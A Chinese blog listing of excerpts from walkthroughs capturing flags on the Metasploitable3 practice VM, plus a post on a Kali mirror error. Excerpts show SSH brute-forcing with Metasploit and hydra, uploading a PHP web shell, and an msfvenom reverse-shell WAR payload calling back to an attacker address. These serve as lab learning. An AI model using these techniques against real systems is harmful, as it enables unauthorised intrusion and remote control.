安全
avasy
这个作者很懒,什么都没留下…
展开
-
metasploitable3 第一个flag, King of Diamond
nmap扫描对应的端口192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10用浏览器访问一下打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息从phpinfo中我们得到以下有关靶机的信息靶机系统版本:Windows NT METASPLOITABLE3 6....原创 2019-02-01 16:47:21 · 3036 阅读 · 4 评论 -
vuluhub
Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware !(IMPORTANT NOTE : The whole challenge is in fren...原创 2019-02-11 01:32:58 · 1203 阅读 · 0 评论 -
另一种方法
上一次拿到tomcat用户名和密码后,可以从tomcat入手,在管理页登录这里显示能上传一个.war文件,我用msfvenom生成一个war的后门msfvenom -p windows/x64/shell_reverse_tcp -f LHOST=192.168.0.108 LPORT=4545payload.war这次不用metasploit,改用netcat侦听4545端口...原创 2019-02-03 21:48:33 · 4325 阅读 · 0 评论 -
Metasploitable3-Ace of Hearts 第八个flag
这是第八个flag.结合之前的信息搜集,我们打开nessus的扫描报告CVE-2015-8249ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadSe...原创 2019-02-03 17:56:46 · 1025 阅读 · 0 评论 -
Metasploitable3-Jack of Clubs 第九个flag
这是第九个flag.首先从nmap扫描中我们可以得出以下信息8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1http-favicon: Apache Tomcathttp-server-header: Apache-Coyote/1.1http-title: Apache Tomcat/8.0.33Tomcat是A...原创 2019-02-03 17:52:15 · 765 阅读 · 0 评论 -
Metasploitable3-Joker 第七个flag
这一次,我要捉一个小丑,joker通过前期nmap的信息搜集,靶机开放的161端口 snmp(public)80端口 http既然开着snmp服务,就先来一波snmp检测在kali下有两个工具可以完成snmp检测,一个是snmp-check,另外一个是msf下的msf>use auxiliary/scanner/snmp/snmp_enum模块首先我方派出的是snmp...原创 2019-02-02 20:17:13 · 1362 阅读 · 0 评论 -
Metasploitable3-Seven of Spades 第六个flag
经过信息搜集,我发现靶机开放22端口所以还是使用ssh爆破,这一次用xhydra,xhydra是hydra的图形化界面在终端上输入xhydra,设置好相关参数点一下Passwords菜单,设置好相关字典在Tuning设置相关进程开始爆破,得出7个可用账户密码任选一个用户登录进入靶机,找到public目录,经过寻找,最终在Documents目录下找到seven_of_spa...原创 2019-02-02 17:36:08 · 1050 阅读 · 0 评论 -
Metasploitable3-Ten of Diamonds 第五个flag
这次依然使用ssh爆破上一次我用的是msf里面的ssh爆破模块,这一次我换一个,hydrahydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码,支持多种网络服务的非常快速的网络登陆破解工具,是一个验证性工具,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,...原创 2019-02-02 15:33:56 · 838 阅读 · 0 评论 -
Metasploitable3-Jack of Hearts 第四个flag
今天要拿下的是第四个flag,Jack of Heart攻击方向是22端口启动msf准备好爆破的字典在msf中搜索ssh爆破模块使用相关模块并设置参数set PASS_FILE ~/pass.txtset USER_FILE ~/user.txtset rhost 192.168.0.100run爆破完成爆出7个session用管理员账户进行ssh登录找到相关f...原创 2019-02-02 13:51:01 · 1033 阅读 · 0 评论 -
Metasploitable3-Six of Diamonds 第三个flag
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。我用到了kali的工具cadaver在上传php文件前,我首先上传一个txt文件验证一下先在kali内新建一个txt文件保存后上传上传成功,打开浏览器验证用gedit新建一个chopper.php文件,用cadver上传上传成功然后用菜刀连接我...原创 2019-02-02 01:23:43 · 1732 阅读 · 0 评论 -
metasploitable3 靶机介绍与相关信息搜集
metasploitable3:虚拟靶机 发布于2016年11月,含有15个flag文件,每个flag文件都是扑克指牌所需系统要求:System Requirements:OS capable of running all of the required applications listed belowVT-x/AMD-V Supported Processor recommende...原创 2019-02-01 18:01:13 · 2911 阅读 · 0 评论 -
Metasploitable3-King of Hearts 第二个flag
在抓捕第一个方块K的过程中,同时发现了第二个flag,红心K的踪迹,它与方块K在同一个木目录下下面,具体过程和前面第一个flag一样,略过不表来到2016目录,点进去,再从09目录点进去来到熟悉的目录下面king of heart和上一个flag不同的地方在于,它的文件名并没有明明白白地写着king of hearts,而是写成metasploitable3_flag,在metaspl...原创 2019-02-01 17:28:21 · 1327 阅读 · 0 评论 -
Kali镜像源同步问题
Kali的源,网络,犹如六月的天,犹如孩子的脸,说变就变,说出问题就出问题,急转弯快的你猝不及防。这不今天又给我搞一出文件尺寸不符(12812582 != 12813041)。您使用的镜像正在同步中? 具体的图我没截,但可以看出又是源出问题。什么?你叫我百度一下解决?嗯,得出的是这种结果,所以说搜技术上的问题,我很少用百度果断谷歌搜了一波我是参照这位大佬的博客改的,...原创 2019-02-19 23:39:50 · 2278 阅读 · 2 评论